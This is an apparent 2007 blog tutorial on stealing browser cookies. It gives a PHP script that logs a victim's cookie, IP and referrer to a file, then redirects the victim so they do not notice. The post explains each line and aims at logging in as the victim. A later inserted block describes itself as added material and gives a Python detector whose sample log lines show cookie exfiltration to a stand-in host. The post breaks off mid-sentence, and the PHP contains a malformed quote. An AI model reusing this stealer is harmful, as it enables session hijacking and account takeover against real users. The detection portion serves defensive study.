Friday, December 14, 2007

Cookie Stealing

What is it?

A cookie stealer is a small script written in a web-based programming language (in this case PHP). It reads a variable from the address bar, which in our case contains the cookies we want to steal. Of course you can add some more information, like the referrer, the IP, and the date and time of the log.

Why use it?

As you might know, most of the time login information is stored in cookies. So if you can make the browser think you're the one who logged in, and set the cookies, you'll be able to log in as the person you defaced. How we make the browser think this, I will teach you later on.

Writing the stealer.

I will give you the script and after that I will explain what it does line by line. So here it is:

1 2 $cookie = $_GET['c];
3 $ip = getenv ('REMOTE_ADDR');
4 $date=date("j F, Y, g:i a");;
5 $referer=getenv ('HTTP_REFERER');
6 $fp = fopen('cookies.txt', 'a');
7 fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.'


');
8 fclose($fp);
9 header ("Location: /picture.html");
10 ?>

That's all! Well, time to explain:
1: 2: $cookie = $_GET['C']; Here the variable $cookie gets its content from the address, from what comes after C=[the cookie].
3: $ip = getenv ('REMOTE_ADDR'); That's the IP of the person who is redirected to our stealer.
4. $date=date("j F, Y, g:i a");; This sets the variable $date to the current time and date. IMPORTANT: this is done in the Dutch way, so year - month - day!
5. $referer=getenv ('HTTP_REFERER'); That must be the referer, don't you think =p
6. $fp = fopen('cookies.txt', 'a'); This specifies the file the cookie is written to, and 'a' stands for the way of writing, in this case adding the new content to the end of the file.
7. fwrite($fp, 'Cookie: '.$cookie.'\n IP: ' .$ip. '\n Date and Time: ' .$date. '\nReferer: '.$referer.'\n\n\n'); This line writes the content to the file.
8. fclose($fp); Close the file (duh).
9. header ("Location: /picture.html"); Send the visitor to another page, so he won't notice that the cookie is logged... of course picture.html can be anything.
10. ?> The closing tag for a PHP script.
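
The two behaviours explained above, a cookie string carried in a query parameter and a redirect sent straight afterwards, are what a defender can look for in proxy or egress logs. The following Python detection is an added example, not part of the original post; the log format, the host names, and the list of session cookie names are assumptions made for the illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed list of session cookie names; extend it for the applications you protect.
SESSION_COOKIES = {"phpsessid", "jsessionid", "asp.net_sessionid", "sessionid"}
COOKIE_PAIR = re.compile(r"^\s*[A-Za-z0-9_.!#$%&'*+^`|~-]+=[^;]*$")
REDIRECTS = {"301", "302", "303", "307"}

# Constructed proxy log lines (assumed format): timestamp client method url status
SAMPLE_LOG = """\
2007-12-14T10:02:11 10.0.0.23 GET http://collector.example/log.php?c=PHPSESSID%3D8f2a9c%3B%20theme%3Ddark 302
2007-12-14T10:02:12 10.0.0.23 GET http://collector.example/picture.html 200
2007-12-14T10:05:40 10.0.0.31 GET http://shop.example/search?q=red%20shoes&page=2 200
2007-12-14T10:07:03 10.0.0.44 GET http://other.example/t.gif?d=lang%3Den%3B%20sessionid%3D77aa01 200
2007-12-14T10:09:00 10.0.0.50 GET http://news.example/a?ref=a=b 200
""".splitlines()

def looks_like_cookie_string(value):
    """True if value reads 'name=value; name=value' and names a session cookie."""
    pairs = [p for p in value.split(";") if p.strip()]
    if not pairs or not all(COOKIE_PAIR.match(p) for p in pairs):
        return False
    names = {p.split("=", 1)[0].strip().lower() for p in pairs}
    return bool(names & SESSION_COOKIES)

def find_cookie_exfil(lines):
    """Return one finding per request that carries a cookie string in its query."""
    findings = []
    for line in lines:
        fields = line.split()
        if len(fields) != 5:
            continue  # skip lines that do not match the assumed format
        _ts, client, _method, url, status = fields
        parts = urlsplit(url)
        # parse_qsl percent-decodes each value, so encoded cookies are caught too.
        for param, value in parse_qsl(parts.query, keep_blank_values=True):
            if looks_like_cookie_string(value):
                # A redirect status on the same request matches the Location header.
                confidence = "high" if status in REDIRECTS else "medium"
                findings.append((client, parts.hostname, param, confidence))
                break
    return findings

if __name__ == "__main__":
    for finding in find_cookie_exfil(SAMPLE_LOG):
        print(finding)
```

The parameter name is not part of the match, so renaming `c` to something else does not hide the request; only the shape of the value matters.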
Now we have to know how to make the link: This must be the most basic version:
